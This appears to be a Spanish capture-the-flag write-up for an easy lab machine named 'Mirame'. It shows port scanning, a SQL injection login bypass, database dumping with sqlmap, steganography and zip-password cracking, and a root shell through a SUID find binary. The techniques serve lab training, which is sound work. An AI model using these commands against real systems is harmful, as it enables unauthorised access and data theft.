Mirame
✍️ Autor: maciiii___ 🔍 Dificultad: Fácil 📅 Fecha de creación: 12/08/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 172.17.0.2para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea un panel de Login.

🚀 EXPLOTACIÓN
Probamos con credenciales básicas y nada pero con una inyección básica si tenemos suerte.
'or 1=1-- -Tras esto nos sale este panel en que si ingresas algo te sale la temperatura.

Vamos a probar con sqlmap para ver que bases de datos hay.
sqlmap -u "http://172.17.0.2/index.php" --forms --batch --dbs
Ahora vemos el contenido de la base de datos users.
sqlmap -u "http://172.17.0.2/index.php" --forms --batch -D users --tables
Ahora vemos el contenido de la tabla de usuarios.
sqlmap -u "http://172.17.0.2/index.php" --forms --batch -D users -T usuarios --dump
Vemos que hay un usuario llamado directorio con la contraseña directoriotravieso suponemos que es un directorio por lo que miramos a ver.

Nos descargamos la imagen para ver si se puede usar la esteganografía. Usamos esta herramienta ya que contiene una contraseña.
stegcracker miramebien.jpg /usr/share/wordlists/rockyou.txt
Miramos que contiene la imagen escondido.
steghide extract -sf miramebien.jpg
Vemos que hay un archivo comprimido llamado ocultito.zip pero al descomprimirlo nos pide una contraseña. Por lo que usamos John.
zip2john ocultito.zip > hashUsamos John para obtener la contraseña.
john hash
Descomprimimos ahora sí el .zip.

Conseguimos unas credenciales.
ssh carlos@172.17.0.2🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoamiaún no somos root, por lo que hacemos:
sudo -lpara ver si hay algo para explotar. No tenemos permisos SUDO.

Buscamos permisos SUID.
find / -perm -4000 2>/dev/null
Nos llama la atención find por lo que buscamos en esta página cómo explotarlo.
/usr/bin/find . -exec /bin/sh -p \; -quit
Last updated
Was this helpful?